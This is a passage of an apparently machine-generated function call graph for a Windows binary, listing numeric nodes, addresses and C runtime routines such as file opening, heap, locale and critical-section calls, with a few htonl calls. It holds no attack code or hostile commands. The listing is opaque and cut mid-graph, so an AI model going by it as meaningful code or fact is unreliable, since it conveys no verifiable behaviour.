___scrt_fastfail 4 API calls 20301->20303 20302->20280 20304 13180d5 20303->20304 20306 1324425 pre_c_initialization 38 API calls 20305->20306 20307 1320340 20306->20307 20308 1320378 20307->20308 20309 131c9ce _free 20 API calls 20307->20309 20308->20282 20310 132036d 20309->20310 20311 1321788 pre_c_initialization 26 API calls 20310->20311 20311->20308 20313 1317fc5 20312->20313 20314 1317fbe 20312->20314 20321 1320795 20313->20321 20318 1320725 20314->20318 20317 1317fc3 20317->20275 20319 1320795 __onexit 29 API calls 20318->20319 20320 1320737 20319->20320 20320->20317 20324 132049c 20321->20324 20327 13203d2 20324->20327 20326 13204c0 20326->20317 20328 13203de ___scrt_is_nonwritable_in_current_image 20327->20328 20335 1325ffe EnterCriticalSection 20328->20335 20330 13203ec 20336 13205e4 20330->20336 20332 13203f9 20346 1320417 20332->20346 20334 132040a ___scrt_is_nonwritable_in_current_image 20334->20326 20335->20330 20337 13205fa pre_c_initialization __crt_fast_encode_pointer 20336->20337 20339 1320602 20336->20339 20337->20332 20338 132065b 20338->20337 20341 132850f __onexit 29 API calls 20338->20341 20339->20337 20339->20338 20349 132850f 20339->20349 20343 1320671 20341->20343 20342 1320651 20344 13209eb _free 20 API calls 20342->20344 20345 13209eb _free 20 API calls 20343->20345 20344->20338 20345->20337 20377 1326046 LeaveCriticalSection 20346->20377 20348 1320421 20348->20334 20350 132851a 20349->20350 20351 1328533 20350->20351 20353 1328542 20350->20353 20354 131c9ce _free 20 API calls 20351->20354 20352 1328551 20365 132c8a2 20352->20365 20353->20352 20358 132c86f 20353->20358 20357 1328538 ___scrt_get_show_window_mode 20354->20357 20357->20342 20359 132c87a 20358->20359 20360 132c88f HeapSize 20358->20360 20361 131c9ce _free 20 API calls 20359->20361 20360->20352 20362 132c87f 20361->20362 20363 1321788 pre_c_initialization 26 API calls 20362->20363 20364 132c88a 20363->20364 20364->20352 20366 132c8ba 20365->20366 20367 132c8af 20365->20367 20369 132c8c2 20366->20369 20375 132c8cb _free 20366->20375 20368 1320a25 __fread_nolock 21 API calls 20367->20368 20373 132c8b7 20368->20373 20370 13209eb _free 20 API calls 20369->20370 20370->20373 20371 132c8d0 20374 131c9ce _free 20 API calls 20371->20374 20372 132c8f5 HeapReAlloc 20372->20373 20372->20375 20373->20357 20374->20373 20375->20371 20375->20372 20376 1328686 _free 7 API calls 20375->20376 20376->20375 20377->20348 20379 132090c pre_c_initialization 20378->20379 20380 13208ec pre_c_initialization 20378->20380 20379->20301 20381 131c9ce _free 20 API calls 20380->20381 20382 1320902 20381->20382 20383 1321788 pre_c_initialization 26 API calls 20382->20383 20383->20379 19640 1324310 19641 132431b 19640->19641 19645 132432b 19640->19645 19646 1324331 19641->19646 19647 1324344 19646->19647 19648 132434a 19646->19648 19649 13209eb _free 20 API calls 19647->19649 19650 13209eb _free 20 API calls 19648->19650 19649->19648 19651 1324356 19650->19651 19652 13209eb _free 20 API calls 19651->19652 19653 1324361 19652->19653 19654 13209eb _free 20 API calls 19653->19654 19655 132436c 19654->19655 19656 13209eb _free 20 API calls 19655->19656 19657 1324377 19656->19657 19658 13209eb _free 20 API calls 19657->19658 19659 1324382 19658->19659 19660 13209eb _free 20 API calls 19659->19660 19661 132438d 19660->19661 19662 13209eb _free 20 API calls 19661->19662 19663 1324398 19662->19663 19664 13209eb _free 20 API calls 19663->19664 19665 13243a3 19664->19665 19666 13209eb _free 20 API calls 19665->19666 19667 13243b1 19666->19667 19672 13241f7 19667->19672 19678 1324103 19672->19678 19674 132421b 19675 1324247 19674->19675 19691 1324164 19675->19691 19679 132410f ___scrt_is_nonwritable_in_current_image 19678->19679 19686 1325ffe EnterCriticalSection 19679->19686 19681 1324143 19687 1324158 19681->19687 19683 1324119 19683->19681 19685 13209eb _free 20 API calls 19683->19685 19684 1324150 ___scrt_is_nonwritable_in_current_image 19684->19674 19685->19681 19686->19683 19690 1326046 LeaveCriticalSection 19687->19690 19689 1324162 19689->19684 19690->19689 19692 1324170 ___scrt_is_nonwritable_in_current_image 19691->19692 19699 1325ffe EnterCriticalSection 19692->19699 19694 132417a 19695 13243da _free 20 API calls 19694->19695 19696 132418d 19695->19696 19700 13241a3 19696->19700 19699->19694 19703 1326046 LeaveCriticalSection 19700->19703 19708 131ea12 19709 131ea1e _abort 19708->19709 19716 1325ffe EnterCriticalSection 19709->19716 19711 131ea2d 19717 131ea9b 19711->19717 19713 132f0f9 _abort 5 API calls 19714 131eabd 19713->19714 19716->19711 19720 1326046 LeaveCriticalSection 19717->19720 19719 131ea8d 19719->19713 19720->19719 17299 1323297 17300 13209c5 __fread_nolock 26 API calls 17299->17300 17301 13232a5 17300->17301 17302 13232d2 17301->17302 17303 13232b3 17301->17303 17305 13232df 17302->17305 17310 13232ec 17302->17310 17304 131c9ce _free 20 API calls 17303->17304 17309 13232b8 17304->17309 17306 131c9ce _free 20 API calls 17305->17306 17306->17309 17307 132337c 17319 13233a8 17307->17319 17310->17307 17310->17309 17311 1328d71 __fread_nolock 26 API calls 17310->17311 17312 132336f 17310->17312 17311->17312 17312->17307 17314 1328dc7 17312->17314 17315 1320a25 __fread_nolock 21 API calls 17314->17315 17316 1328de2 17315->17316 17317 13209eb _free 20 API calls 17316->17317 17318 1328dec 17317->17318 17318->17307 17320 13209c5 __fread_nolock 26 API calls 17319->17320 17321 13233b7 17320->17321 17322 132345b 17321->17322 17323 13233c9 17321->17323 17324 1322fa0 __wsopen_s 62 API calls 17322->17324 17325 13233e6 17323->17325 17328 132340c 17323->17328 17327 13233f3 17324->17327 17326 1322fa0 __wsopen_s 62 API calls 17325->17326 17326->17327 17327->17309 17328->17327 17329 13227ec 30 API calls 17328->17329 17329->17327 20438 1328599 20441 13285bf 20438->20441 20442 13285bb 20438->20442 20439 131786a _ValidateLocalCookies 5 API calls 20440 1328621 20439->20440 20441->20442 20443 132298e 31 API calls 20441->20443 20442->20439 20443->20441 19721 1326e00 19732 132c358 19721->19732 19723 1326e05 ___scrt_is_nonwritable_in_current_image 19738 1325ffe EnterCriticalSection 19723->19738 19725 1326e83 19743 1326e98 19725->19743 19727 1326e8f ___scrt_is_nonwritable_in_current_image 19729 1326e21 19729->19725 19731 1319813 65 API calls 19729->19731 19739 131a847 EnterCriticalSection 19729->19739 19740 1326e79 19729->19740 19731->19729 19733 132c367 19732->19733 19734 13209eb _free 20 API calls 19733->19734 19735 132c37a 19733->19735 19734->19733 19736 13209eb _free 20 API calls 19735->19736 19737 132c392 19735->19737 19736->19735 19737->19723 19738->19729 19739->19729 19746 131a85b LeaveCriticalSection 19740->19746 19742 1326e81 19742->19729 19747 1326046 LeaveCriticalSection 19743->19747 19745 1326e9f 19745->19727 19746->19742 19747->19745 17046 1325e01 17051 1325bbd 17046->17051 17050 1325e29 17052 1325bee 17051->17052 17059 1325d37 17052->17059 17066 132b469 17052->17066 17053 131c9ce _free 20 API calls 17054 1325ded 17053->17054 17055 1321788 pre_c_initialization 26 API calls 17054->17055 17056 1325d42 17055->17056 17056->17050 17063 132c048 17056->17063 17059->17053 17059->17056 17060 132b469 40 API calls 17061 1325daa 17060->17061 17061->17059 17062 132b469 40 API calls 17061->17062 17062->17059 17085 132b745 17063->17085 17065 132c063 17065->17050 17067 132b509 17066->17067 17068 132b47d 17066->17068 17074 132b521 17067->17074 17070 131c9ce _free 20 API calls 17068->17070 17072 1325d8b 17068->17072 17071 132b494 17070->17071 17073 1321788 pre_c_initialization 26 API calls 17071->17073 17072->17059 17072->17060 17073->17072 17075 132b537 17074->17075 17082 132b54e 17074->17082 17076 132b53e 17075->17076 17078 132b55f 17075->17078 17077 131c9ce _free 20 API calls 17076->17077 17079 132b543 17077->17079 17080 131afae __cftof 38 API calls 17078->17080 17081 1321788 pre_c_initialization 26 API calls 17079->17081 17084 132b56a 17080->17084 17081->17082 17082->17072 17083 132aaea 40 API calls 17083->17084 17084->17082 17084->17083 17087 132b751 ___scrt_is_nonwritable_in_current_image 17085->17087 17086 132b75f 17088 131c9ce _free 20 API calls 17086->17088 17087->17086 17090 132b798 17087->17090 17089 132b764 17088->17089 17091 1321788 pre_c_initialization 26 API calls 17089->17091 17096 132bd1f 17090->17096 17095 132b76e ___scrt_is_nonwritable_in_current_image 17091->17095 17095->17065 17147 132baf3 17096->17147 17099 132bd51 17101 131c9bb __dosmaperr 20 API calls 17099->17101 17100 132bd6a 17165 131e783 17100->17165 17119 132bd56 17101->17119 17103 132bd6f 17104 132bd78 17103->17104 17105 132bd8f 17103->17105 17107 131c9bb __dosmaperr 20 API calls 17104->17107 17178 132ba5e CreateFileW 17105->17178 17106 131c9ce _free 20 API calls 17134 132b7bc 17106->17134 17109 132bd7d 17107->17109 17112 131c9ce _free 20 API calls 17109->17112 17110 132bdc8 17111 132be45 GetFileType 17110->17111 17113 132be1a GetLastError 17110->17113 17179 132ba5e CreateFileW 17110->17179 17114 132be50 GetLastError 17111->17114 17115 132be97 17111->17115 17112->17119 17116 131c998 __dosmaperr 20 API calls 17113->17116 17117 131c998 __dosmaperr 20 API calls 17114->17117 17180 131e6cc 17115->17180 17116->17119 17120 132be5e CloseHandle 17117->17120 17119->17106 17120->17119 17123 132be87 17120->17123 17122 132be0d 17122->17111 17122->17113 17125 131c9ce _free 20 API calls 17123->17125 17127 132be8c 17125->17127 17126 132bf04 17131 132bf31 17126->17131 17204 132b811 17126->17204 17127->17119 17133 13218f4 __wsopen_s 29 API calls 17131->17133 17132 132bf42 17132->17134 17133->17134 17143 132b7e5 17134->17143 17144 132b7eb 17143->17144 17146 132b80f 17143->17146 17298 131e760 LeaveCriticalSection 17144->17298 17146->17095 17148 132bb14 17147->17148 17149 132bb2e 17147->17149 17148->17149 17151 131c9ce _free 20 API calls 17148->17151 17231 132ba83 17149->17231 17152 132bb23 17151->17152 17153 1321788 pre_c_initialization 26 API calls 17152->17153 17153->17149 17154 132bb66 17155 132bb95 17154->17155 17157 131c9ce _free 20 API calls 17154->17157 17160 132bbe8 17155->17160 17238 131d7e9 17155->17238 17159 132bb8a 17157->17159 17158 132bbe3 17158->17160 17161 132bc62 17158->17161 17162 1321788 pre_c_initialization 26 API calls 17159->17162 17160->17099 17160->17100 17163 1321798 __wsopen_s 11 API calls 17161->17163 17162->17155 17164 132bc6e 17163->17164 17166 131e78f ___scrt_is_nonwritable_in_current_image 17165->17166 17245 1325ffe EnterCriticalSection 17166->17245 17168 131e7dd 17246 131e88c 17168->17246 17169 131e7bb 17249 131e562 17169->17249 17170 131e796 17170->17168 17170->17169 17175 131e829 EnterCriticalSection 17170->17175 17173 131e806 ___scrt_is_nonwritable_in_current_image 17173->17103 17175->17168 17176 131e836 LeaveCriticalSection 17175->17176 17176->17170 17178->17110 17179->17122 17181 131e744 17180->17181 17182 131e6db 17180->17182 17183 131c9ce _free 20 API calls 17181->17183 17182->17181 17188 131e701 __wsopen_s 17182->17188 17184 131e749 17183->17184 17185 131c9bb __dosmaperr 20 API calls 17184->17185 17186 131e731 17185->17186 17186->17126 17189 132bc6f 17186->17189 17187 131e72b SetStdHandle 17187->17186 17188->17186 17188->17187 17190 132bc95 17189->17190 17191 132bc99 17189->17191 17190->17126 17191->17190 17192 1322807 __fread_nolock 28 API calls 17191->17192 17193 132bcab 17192->17193 17205 132b844 17204->17205 17229 132b83d 17204->17229 17206 131d7e9 __wsopen_s 26 API calls 17205->17206 17209 132b865 17205->17209 17209->17229 17229->17131 17229->17132 17232 132ba9b 17231->17232 17233 132bab6 17232->17233 17234 131c9ce _free 20 API calls 17232->17234 17233->17154 17235 132bada 17234->17235 17236 1321788 pre_c_initialization 26 API calls 17235->17236 17237 132bae5 17236->17237 17237->17154 17239 131d7f5 17238->17239 17240 131d80a 17238->17240 17241 131c9ce _free 20 API calls 17239->17241 17240->17158 17242 131d7fa 17241->17242 17243 1321788 pre_c_initialization 26 API calls 17242->17243 17244 131d805 17243->17244 17244->17158 17245->17170 17257 1326046 LeaveCriticalSection 17246->17257 17248 131e893 17248->17173 17250 1320b10 _free 20 API calls 17249->17250 17252 131e574 17250->17252 17251 13209eb _free 20 API calls 17253 131e5d3 17251->17253 17254 132391e __wsopen_s 11 API calls 17252->17254 17255 131e581 17252->17255 17253->17168 17256 131e6a9 EnterCriticalSection 17253->17256 17254->17252 17255->17251 17256->17168 17257->17248 17298->17146 19430 131fa8a 19431 131faac 19430->19431 19433 131fa93 19430->19433 19432 131fa9b 19433->19432 19437 131fb12 19433->19437 19435 131faa3 19435->19432 19448 131fddf 19435->19448 19438 131fb1b 19437->19438 19439 131fb1e 19437->19439 19438->19435 19458 1327ce3 GetEnvironmentStringsW 19439->19458 19442 131fb2b 19444 13209eb _free 20 API calls 19442->19444 19445 131fb60 19444->19445 19445->19435 19446 131fb36 19447 13209eb _free 20 API calls 19446->19447 19447->19442 19449 131fdec 19448->19449 19455 131fdf1 19448->19455 19449->19431 19450 131fdf7 MultiByteToWideChar 19450->19455 19456 131fe46 19450->19456 19451 1320b10 _free 20 API calls 19451->19455 19452 131fe1b MultiByteToWideChar 19453 131fe4c 19452->19453 19452->19455 19454 13209eb _free 20 API calls 19453->19454 19454->19456 19455->19450 19455->19451 19455->19452 19455->19453 19455->19456 19457 13209eb _free 20 API calls 19455->19457 19456->19431 19457->19455 19459 1327cf7 19458->19459 19460 131fb25 19458->19460 19461 1320a25 __fread_nolock 21 API calls 19459->19461 19460->19442 19465 131fc37 19460->19465 19462 1327d0b __fread_nolock 19461->19462 19463 13209eb _free 20 API calls 19462->19463 19464 1327d25 FreeEnvironmentStringsW 19463->19464 19464->19460 19467 131fc55 19465->19467 19466 1320b10 _free 20 API calls 19476 131fc8f 19466->19476 19467->19466 19468 13209eb _free 20 API calls 19469 131fd1a 19468->19469 19469->19446 19470 1320b10 _free 20 API calls 19470->19476 19471 131fd02 19491 131fd31 19471->19491 19475 13209eb _free 20 API calls 19478 131fd00 19475->19478 19476->19470 19476->19471 19477 131fd24 19476->19477 19476->19478 19480 13209eb _free 20 API calls 19476->19480 19482 132618c 19476->19482 19479 1321798 __wsopen_s 11 API calls 19477->19479 19478->19468 19481 131fd30 19479->19481 19480->19476 19483 1326199 19482->19483 19484 13261a7 19482->19484 19483->19484 19489 13261c0 19483->19489 19485 131c9ce _free 20 API calls 19484->19485 19486 13261b1 19485->19486 19487 1321788 pre_c_initialization 26 API calls 19486->19487 19488 13261bb 19487->19488 19488->19476 19489->19488 19490 131c9ce _free 20 API calls 19489->19490 19490->19486 19492 131fd08 19491->19492 19493 131fd3e 19491->19493 19492->19475 19494 131fd55 19493->19494 19495 13209eb _free 20 API calls 19493->19495 19496 13209eb _free 20 API calls 19494->19496 19495->19493 19496->19492 20463 132548c 20464 1325642 20463->20464 20466 13254b6 20463->20466 20465 131c9ce _free 20 API calls 20464->20465 20483 132562d 20465->20483 20466->20464 20469 1325513 20466->20469 20467 131786a _ValidateLocalCookies 5 API calls 20468 132565f 20467->20468 20484 132b3ce 20469->20484 20471 1325533 20492 132ac02 20471->20492 20473 1325547 20474 1325663 20473->20474 20499 132ac2e 20473->20499 20475 1321798 __wsopen_s 11 API calls 20474->20475 20477 132566d 20475->20477 20478 1325559 20478->20474 20506 132ac5a 20478->20506 20480 132556b 20480->20474 20481 1325574 20480->20481 20481->20483 20513 132b41f 20481->20513 20483->20467 20485 132b3da ___scrt_is_nonwritable_in_current_image 20484->20485 20486 132b410 ___scrt_is_nonwritable_in_current_image 20485->20486 20521 1325ffe EnterCriticalSection 20485->20521 20486->20471 20488 132b3ea 20491 132b3fd 20488->20491 20522 132b2ee 20488->20522 20540 132b416 20491->20540 20493 132ac23 20492->20493 20494 132ac0e 20492->20494 20493->20473 20495 131c9ce _free 20 API calls 20494->20495 20496 132ac13 20495->20496 20497 1321788 pre_c_initialization 26 API calls 20496->20497 20498 132ac1e 20497->20498 20498->20473 20500 132ac3a 20499->20500 20501 132ac4f 20499->20501 20502 131c9ce _free 20 API calls 20500->20502 20501->20478 20503 132ac3f 20502->20503 20504 1321788 pre_c_initialization 26 API calls 20503->20504 20505 132ac4a 20504->20505 20505->20478 20507 132ac66 20506->20507 20508 132ac7b 20506->20508 20509 131c9ce _free 20 API calls 20507->20509 20508->20480 20510 132ac6b 20509->20510 20511 1321788 pre_c_initialization 26 API calls 20510->20511 20512 132ac76 20511->20512 20512->20480 20514 132b42b ___scrt_is_nonwritable_in_current_image 20513->20514 20650 1325ffe EnterCriticalSection 20514->20650 20516 132b436 20651 132ac86 20516->20651 20520 132b455 ___scrt_is_nonwritable_in_current_image 20520->20483 20521->20488 20524 132b33a 20522->20524 20523 132b341 20526 132b3b1 20523->20526 20527 132b3a8 20523->20527 20524->20523 20525 1320a25 __fread_nolock 21 API calls 20524->20525 20531 132b359 20525->20531 20604 132b193 20526->20604 20543 132afbe 20527->20543 20530 132b360 20534 13209eb _free 20 API calls 20530->20534 20531->20530 20537 132b386 20531->20537 20532 132b3ae 20533 13209eb _free 20 API calls 20532->20533 20535 132b3bc 20533->20535 20534->20523 20536 131786a _ValidateLocalCookies 5 API calls 20535->20536 20538 132b3ca 20536->20538 20539 13209eb _free 20 API calls 20537->20539 20538->20491 20539->20523 20649 1326046 LeaveCriticalSection 20540->20649 20542 132b41d 20542->20486 20544 132afcd 20543->20544 20545 132ac5a 26 API calls 20544->20545 20546 132afe3 20545->20546 20547 132ac02 26 API calls 20546->20547 20601 132b15d 20546->20601 20550 132aff5 20547->20550 20548 1321798 __wsopen_s 11 API calls 20551 132b192 20548->20551 20549 13209eb _free 20 API calls 20553 132b045 20549->20553 20550->20549 20556 132b166 20550->20556 20550->20601 20552 132ac5a 26 API calls 20551->20552 20554 132b1b8 20552->20554 20559 1320a25 __fread_nolock 21 API calls 20553->20559 20555 132b2e3 20554->20555 20558 132ac02 26 API calls 20554->20558 20557 1321798 __wsopen_s 11 API calls 20555->20557 20556->20532 20564 132b2ed 20557->20564 20560 132b1ca 20558->20560 20561 132b05d 20559->20561 20560->20555 20563 132ac2e 26 API calls 20560->20563 20562 13209eb _free 20 API calls 20561->20562 20569 132b069 20562->20569 20565 132b1dc 20563->20565 20566 132b341 20564->20566 20570 1320a25 __fread_nolock 21 API calls 20564->20570 20565->20555 20567 132b1e5 20565->20567 20571 132b3b1 20566->20571 20576 132b3a8 20566->20576 20568 13209eb _free 20 API calls 20567->20568 20572 132b1f0 GetTimeZoneInformation 20568->20572 20569->20556 20573 1320a73 26 API calls 20569->20573 20575 132b359 20570->20575 20578 132b193 45 API calls 20571->20578 20577 132b20c 20572->20577 20596 132b2ad 20572->20596 20574 132b093 20573->20574 20581 13250a9 26 API calls 20574->20581 20574->20601 20588 132b360 20575->20588 20589 132b386 20575->20589 20579 132afbe 45 API calls 20576->20579 20644 1327d59 20577->20644 20580 132b3ae 20578->20580 20579->20580 20582 13209eb _free 20 API calls 20580->20582 20587 132b0ac 20581->20587 20584 132b3bc 20582->20584 20583 13209eb _free 20 API calls 20583->20566 20585 131786a _ValidateLocalCookies 5 API calls 20584->20585 20590 132b3ca 20585->20590 20587->20601 20640 1321594 20587->20640 20588->20583 20592 13209eb _free 20 API calls 20589->20592 20590->20532 20592->20566 20593 132b27f WideCharToMultiByte 20593->20596 20596->20532 20598 132b120 20598->20556 20600 13250a9 26 API calls 20598->20600 20599 1321594 42 API calls 20602 132b0fb 20599->20602 20600->20601 20601->20548 20601->20556 20602->20598 20603 1321594 42 API calls 20602->20603 20603->20598 20605 132b1a2 20604->20605 20606 132ac5a 26 API calls 20605->20606 20607 132b1b8 20606->20607 20608 132b2e3 20607->20608 20610 132ac02 26 API calls 20607->20610 20609 1321798 __wsopen_s 11 API calls 20608->20609 20613 132b2ed 20609->20613 20611 132b1ca 20610->20611 20611->20608 20612 132ac2e 26 API calls 20611->20612 20614 132b1dc 20612->20614 20615 132b341 20613->20615 20618 1320a25 __fread_nolock 21 API calls 20613->20618 20614->20608 20616 132b1e5 20614->20616 20619 132b3b1 20615->20619 20622 132b3a8 20615->20622 20617 13209eb _free 20 API calls 20616->20617 20620 132b1f0 GetTimeZoneInformation 20617->20620 20621 132b359 20618->20621 20624 132b193 45 API calls 20619->20624 20623 132b20c 20620->20623 20634 132b2ad 20620->20634 20632 132b360 20621->20632 20633 132b386 20621->20633 20625 132afbe 45 API calls 20622->20625 20631 1327d59 38 API calls 20623->20631 20626 132b3ae 20624->20626 20625->20626 20627 13209eb _free 20 API calls 20626->20627 20629 132b3bc 20627->20629 20628 13209eb _free 20 API calls 20628->20615 20630 131786a _ValidateLocalCookies 5 API calls 20629->20630 20635 132b3ca 20630->20635 20636 132b261 WideCharToMultiByte 20631->20636 20632->20628 20637 13209eb _free 20 API calls 20633->20637 20634->20532 20635->20532 20638 132b27f WideCharToMultiByte 20636->20638 20637->20615 20638->20634 20641 13215ad 20640->20641 20642 1320bbb 42 API calls 20641->20642 20643 13215b7 20642->20643 20643->20598 20643->20599 20645 1324425 pre_c_initialization 38 API calls 20644->20645 20646 1327d64 20645->20646 20647 1324574 __cftof 38 API calls 20646->20647 20648 1327d74 WideCharToMultiByte 20647->20648 20648->20593 20649->20542 20650->20516 20652 132ac02 26 API calls 20651->20652 20653 132ac9b 20652->20653 20654 132ae62 20653->20654 20655 132aca4 20653->20655 20656 1321798 __wsopen_s 11 API calls 20654->20656 20658 132ada4 20655->20658 20659 132acd8 20655->20659 20661 132ad9f 20655->20661 20657 132ae6c 20656->20657 20660 132ae6d 26 API calls 20658->20660 20670 132ae6d 20659->20670 20662 132add9 20660->20662 20667 132b460 20661->20667 20665 132ae6d 26 API calls 20662->20665 20665->20661 20666 132ae6d 26 API calls 20666->20661 20677 1326046 LeaveCriticalSection 20667->20677 20669 132b467 20669->20520 20673 132ae83 20670->20673 20671 132ad38 20671->20666 20672 132ac2e 26 API calls 20674 132af64 20672->20674 20673->20671 20673->20672 20674->20671 20675 1321798 __wsopen_s 11 API calls 20674->20675 20676 132afbc 20675->20676 20677->20669 20847 131a7fb 20857 131dade 20847->20857 20851 131a808 20852 1321aed 20 API calls 20851->20852 20853 131a817 DeleteCriticalSection 20852->20853 20853->20851 20854 131a832 20853->20854 20855 13209eb _free 20 API calls 20854->20855 20856 131a83d 20855->20856 20858 131dae7 66 API calls 20857->20858 20859 131a803 20858->20859 20860 1323b47 20859->20860 20861 1323b53 ___scrt_is_nonwritable_in_current_image 20860->20861 20870 1325ffe EnterCriticalSection 20861->20870 20863 1323b5e 20864 1323bc9 20863->20864 20866 1323b9d DeleteCriticalSection 20863->20866 20868 1319889 67 API calls 20863->20868 20871 1323bde 20864->20871 20869 13209eb _free 20 API calls 20866->20869 20867 1323bd5 ___scrt_is_nonwritable_in_current_image 20867->20851 20868->20863 20869->20863 20870->20863 20874 1326046 LeaveCriticalSection 20871->20874 20873 1323be5 20873->20867 20874->20873 15954 1311560 15955 1311578 15954->15955 15956 131156a 15954->15956 15973 131160d 15955->15973 15986 1311120 15955->15986 16032 13128c0 15956->16032 15959 131158b 15962 131159e 15959->15962 16004 1319f16 15959->16004 16007 13113d0 15962->16007 15963 13115af 15964 13115b7 htonl htonl 15963->15964 15963->15973 15965 1319f16 64 API calls 15964->15965 15966 13115e3 htonl 15965->15966 15967 13115f4 15966->15967 15968 1311615 htonl 15967->15968 15969 13115fe 15967->15969 16018 1319b2b 15968->16018 16041 13117b0 15969->16041 15974 1311632 15976 13117b0 59 API calls 15974->15976 15975 1311649 htonl 16021 1319934 15975->16021 15978 1311641 15976->15978 15979 131165e 15980 1311665 15979->15980 15981 1311677 15979->15981 16055 1311910 15980->16055 16028 1311200 15981->16028 15987 1319f16 64 API calls 15986->15987 15988 1311139 15987->15988 15989 1319b2b __fread_nolock 40 API calls 15988->15989 15990 1311149 15989->15990 15991 13111f2 15990->15991 15992 1319f16 64 API calls 15990->15992 15991->15959 15993 131116d 15992->15993 15994 1319b2b __fread_nolock 40 API calls 15993->15994 15995 131117d 15994->15995 15996 1319f16 64 API calls 15995->15996 15997 131118e 15996->15997 15998 1319b2b __fread_nolock 40 API calls 15997->15998 15999 131119e 15998->15999 15999->15991 16000 1319f16 64 API calls 15999->16000 16001 13111d0 16000->16001 16002 1319b2b __fread_nolock 40 API calls 16001->16002 16003 13111e0 16002->16003 16003->15959 16063 1319cdd 16004->16063 16006 1319f2c 16006->15962 16008 1319f16 64 API calls 16007->16008 16009 13113fa 16008->16009 16010 131143d 16009->16010 16012 1319b2b __fread_nolock 40 API calls 16009->16012 16011 131786a _ValidateLocalCookies 5 API calls 16010->16011 16013 131144e 16011->16013 16014 1311411 16012->16014 16013->15963 16014->16010 16015 1311452 htonl 16014->16015 16016 131786a _ValidateLocalCookies 5 API calls 16015->16016 16017 13114ab 16016->16017 16017->15963 16327 1319b48 16018->16327 16020 131162a 16020->15974 16020->15975 16022 1319940 16021->16022 16023 1319954 16021->16023 16024 131c9ce _free 20 API calls 16022->16024 16023->15979 16025 1319945 16024->16025 16026 1321788 pre_c_initialization 26 API calls 16025->16026 16027 1319950 16026->16027 16027->15979 16029 131120b 16028->16029 16030 1311211 16028->16030 16466 1319889 16029->16466 16562 1314bf0 16032->16562 16034 13128f3 16035 1314bf0 59 API calls 16034->16035 16036 1312900 16035->16036 16577 131d62f 16036->16577 16039 131786a _ValidateLocalCookies 5 API calls 16040 1312921 16039->16040 16040->15955 16042 13117ec ___scrt_initialize_default_local_stdio_options 16041->16042 16043 131c90d 50 API calls 16042->16043 16044 13117fa 16043->16044 16045 131c9ce _free 20 API calls 16044->16045 16046 13117ff 16045->16046 17029 131ca5d 16046->17029 16049 1311ac0 50 API calls 16050 1311824 16049->16050 16051 13119f0 59 API calls 16050->16051 16052 1311838 16051->16052 16053 131786a _ValidateLocalCookies 5 API calls 16052->16053 16054 131184a 16053->16054 16054->15973 16056 1311944 ___scrt_initialize_default_local_stdio_options 16055->16056 16057 131c90d 50 API calls 16056->16057 16058 1311952 16057->16058 16059 13119f0 59 API calls 16058->16059 16060 1311963 16059->16060 16061 131786a _ValidateLocalCookies 5 API calls 16060->16061 16062 131166f 16061->16062 16064 1319ce9 ___scrt_is_nonwritable_in_current_image 16063->16064 16065 1319cf5 16064->16065 16067 1319d1b 16064->16067 16066 131c9ce _free 20 API calls 16065->16066 16069 1319cfa 16066->16069 16076 131a847 EnterCriticalSection 16067->16076 16071 1321788 pre_c_initialization 26 API calls 16069->16071 16070 1319d27 16077 1319e3d 16070->16077 16075 1319d05 ___scrt_is_nonwritable_in_current_image 16071->16075 16073 1319d3b 16088 1319d5a 16073->16088 16075->16006 16076->16070 16078 1319e5f 16077->16078 16079 1319e4f 16077->16079 16091 1319d64 16078->16091 16080 131c9ce _free 20 API calls 16079->16080 16082 1319e54 16080->16082 16082->16073 16083 1319e82 16087 1319f01 16083->16087 16095 131da31 16083->16095 16087->16073 16326 131a85b LeaveCriticalSection 16088->16326 16090 1319d62 16090->16075 16092 1319d70 16091->16092 16093 1319d77 16091->16093 16092->16083 16093->16092 16094 1322807 __fread_nolock 28 API calls 16093->16094 16094->16092 16096 131da49 16095->16096 16100 1319ea9 16095->16100 16097 13209c5 __fread_nolock 26 API calls 16096->16097 16096->16100 16098 131da69 16097->16098 16104 1322fa0 16098->16104 16101 1322807 16100->16101 16102 132276e __fread_nolock 28 API calls 16101->16102 16103 132281d 16102->16103 16103->16087 16105 1322fac ___scrt_is_nonwritable_in_current_image 16104->16105 16106 1322fb4 16105->16106 16107 1322fcc 16105->16107 16108 131c9bb __dosmaperr 20 API calls 16106->16108 16109 132306a 16107->16109 16113 1323001 16107->16113 16110 1322fb9 16108->16110 16111 131c9bb __dosmaperr 20 API calls 16109->16111 16112 131c9ce _free 20 API calls 16110->16112 16114 132306f 16111->16114 16124 1322fc1 ___scrt_is_nonwritable_in_current_image 16112->16124 16129 131e6a9 EnterCriticalSection 16113->16129 16116 131c9ce _free 20 API calls 16114->16116 16118 1323077 16116->16118 16117 1323007 16119 1323023 16117->16119 16120 1323038 16117->16120 16121 1321788 pre_c_initialization 26 API calls 16118->16121 16123 131c9ce _free 20 API calls 16119->16123 16130 132308b 16120->16130 16121->16124 16126 1323028 16123->16126 16124->16100 16125 1323033 16183 1323062 16125->16183 16127 131c9bb __dosmaperr 20 API calls 16126->16127 16127->16125 16129->16117 16131 13230b9 16130->16131 16169 13230b2 16130->16169 16132 13230bd 16131->16132 16134 13230dc 16131->16134 16133 131c9bb __dosmaperr 20 API calls 16132->16133 16136 13230c2 16133->16136 16137 132312d 16134->16137 16138 1323110 16134->16138 16135 131786a _ValidateLocalCookies 5 API calls 16139 1323293 16135->16139 16140 131c9ce _free 20 API calls 16136->16140 16141 1323143 16137->16141 16145 1322807 __fread_nolock 28 API calls 16137->16145 16142 131c9bb __dosmaperr 20 API calls 16138->16142 16139->16125 16144 13230c9 16140->16144 16186 1322c30 16141->16186 16143 1323115 16142->16143 16147 131c9ce _free 20 API calls 16143->16147 16148 1321788 pre_c_initialization 26 API calls 16144->16148 16145->16141 16150 132311d 16147->16150 16148->16169 16153 1321788 pre_c_initialization 26 API calls 16150->16153 16153->16169 16169->16135 16325 131e760 LeaveCriticalSection 16183->16325 16185 1323068 16185->16124 16231 1328d71 16186->16231 16188 1322c40 16232 1328d8b 16231->16232 16233 1328d7e 16231->16233 16235 131c9ce _free 20 API calls 16232->16235 16237 1328d97 16232->16237 16234 131c9ce _free 20 API calls 16233->16234 16236 1328d83 16234->16236 16238 1328db8 16235->16238 16236->16188 16237->16188 16325->16185 16326->16090 16328 1319b54 ___scrt_is_nonwritable_in_current_image 16327->16328 16329 1319b94 16328->16329 16330 1319b67 ___scrt_get_show_window_mode 16328->16330 16331 1319b8c ___scrt_is_nonwritable_in_current_image 16328->16331 16340 131a847 EnterCriticalSection 16329->16340 16334 131c9ce _free 20 API calls 16330->16334 16331->16020 16333 